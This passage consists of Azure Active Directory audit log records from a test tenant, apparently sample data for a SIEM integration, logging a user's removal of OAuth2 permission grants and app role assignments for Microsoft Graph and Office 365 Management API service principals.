"Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": 
"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": 
"98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", 
"Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:16:18", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": 
"5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2e358876-29c8-45b5-8dba-e233cf769988"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:16:18.9844570Z"}, {"Name": "env_epoch", "Value": "Z4XUI"}, {"Name": "env_seqNum", "Value": "43649666"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR581"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove OAuth2PermissionGrant.", "Id": "ec6ba716-ec04-460a-8d9e-661d732c4689"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": 
"asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": 
"auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, 
{"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "31d7436e-85aa-4aee-a945-6a0ff51ea975"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, 
"ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908041"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR551"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "7bca6665-4d58-4df9-bd34-4d92e1fc63aa"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:00", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": 
"71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "b2484c3c-5461-43ab-850b-70fccf706796"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:00.2133065Z"}, {"Name": "env_epoch", "Value": "OLE3R"}, {"Name": "env_seqNum", "Value": "55908032"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, 